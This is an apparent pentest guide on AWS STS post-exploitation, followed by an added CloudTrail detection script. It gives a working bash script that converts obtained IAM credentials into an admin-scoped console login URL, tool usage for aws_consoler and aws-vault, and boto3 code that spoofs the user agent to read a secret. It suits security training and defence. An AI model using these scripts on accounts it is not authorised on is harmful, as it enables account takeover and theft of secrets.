# AWS - STS Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## STS

For more information:

{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}

### From IAM Creds to Console

If you have managed to obtain some IAM credentials you might be interested in **accessing the web console** using the following tools.\
Note that the user/role must have the **`sts:GetFederationToken`** permission.

#### Custom script

The following script will use the default profile and the default AWS partition (not gov and not cn) to give you a signed URL that you can use to log into the web console:

```bash
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile ] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
status=$?
if [ $status -ne 0 ]; then
    echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
    exit $status
fi

# Parse the output
session_id=$(echo "$output" | jq -r '.Credentials.AccessKeyId')
session_key=$(echo "$output" | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo "$output" | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
    --get \
    --data-urlencode "Action=getSigninToken" \
    --data-urlencode "SessionDuration=43200" \
    --data-urlencode "Session=$json_creds" )
signin_token=$(echo -n "$resp" | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)

# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
```

#### aws_consoler

You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).

```bash
cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] # This will generate a link to login into the console
```

> [!WARNING]
> Make sure the IAM user has the `sts:GetFederationToken` permission, or provide a role to assume.

#### aws-vault

[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.

```bash
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
```

> [!NOTE]
> You can also use **aws-vault** to obtain a **browser console session**

### **Bypassing User-Agent restrictions from Python**

If there is a **restriction on performing certain actions based on the user agent** in use (such as restricting use of the python boto3 library based on its user agent), it is possible to use the previous technique to **connect to the web console through a browser**, or you can directly **modify the boto3 user agent** by doing:

```python
# Shared by ex16x41
import boto3

# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register(
    'before-call.secretsmanager.GetSecretValue',
    lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'})
)

# Perform the action
response = client.get_secret_value(SecretId="flag_secret")
print(response['SecretString'])
```
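The defender-side counterpart to the two techniques above, added here as an example that is not part of the original page: a small triage over CloudTrail-shaped records that flags `GetFederationToken` requests carrying a broad managed policy, links the token name to the later federated `ConsoleLogin`, and records an unexpected user agent only as low-severity context, since that header is chosen by the client. The sample events are constructed, and the `EXPECTED_AGENT_PREFIXES` baseline is an assumption for the example account.

```python
# Constructed sample CloudTrail records for this example (not real logs).
# Field names follow CloudTrail's record layout; the values are invented.
SAMPLE_EVENTS = [
    {"eventSource": "sts.amazonaws.com", "eventName": "GetFederationToken",
     "userIdentity": {"type": "IAMUser", "userName": "dev-ci"}, "userAgent": "aws-cli/2.15.0",
     "requestParameters": {"name": "consoler", "durationSeconds": 43200,
                           "policyArns": [{"arn": "arn:aws:iam::aws:policy/AdministratorAccess"}]}},
    {"eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin",
     "userIdentity": {"type": "FederatedUser", "userName": "consoler"}, "userAgent": "Mozilla/5.0",
     "responseElements": {"ConsoleLogin": "Success"}},
    {"eventSource": "secretsmanager.amazonaws.com", "eventName": "GetSecretValue",
     "userIdentity": {"type": "IAMUser", "userName": "dev-ci"}, "userAgent": "my-custom-tool",
     "requestParameters": {"secretId": "flag_secret"}},
]

BROAD_POLICIES = {"arn:aws:iam::aws:policy/AdministratorAccess"}
EXPECTED_AGENT_PREFIXES = ("Boto3", "aws-cli", "Mozilla")  # assumed baseline for this account

def triage(events):
    """Return (severity, message) findings; token names are linked to later federated logins."""
    findings, issuers = [], {}  # issuers: federation token name -> IAM principal that requested it
    for e in events:
        name = e.get("eventName")
        ident = e.get("userIdentity", {})
        who = ident.get("userName", "?")
        if name == "GetFederationToken":
            params = e.get("requestParameters", {})
            issuers[params.get("name")] = who
            broad = {p.get("arn") for p in params.get("policyArns", [])} & BROAD_POLICIES
            findings.append(("high" if broad else "medium",
                             f"{who} requested a federation token named '{params.get('name')}'"
                             + (f" with broad policy {sorted(broad)}" if broad else "")))
        elif name == "ConsoleLogin" and ident.get("type") == "FederatedUser":
            via = issuers.get(who)  # federated userName matches the --name given to GetFederationToken
            findings.append(("high" if via else "medium",
                             f"console login by federated session '{who}'"
                             + (f" issued by {via}" if via else "")))
        elif not e.get("userAgent", "").startswith(EXPECTED_AGENT_PREFIXES):
            # userAgent is set by the client, so this is context for the analyst, not a control
            findings.append(("low", f"{who} called {name} with unexpected user agent '{e.get('userAgent')}'"))
    return findings

if __name__ == "__main__":
    for sev, msg in triage(SAMPLE_EVENTS):
        print(f"[{sev}] {msg}")
```

The user-agent finding is deliberately the weakest signal: an IAM condition on `aws:UserAgent` is bypassed exactly as the section above shows, so the federation and console-login events are what the alert should key on.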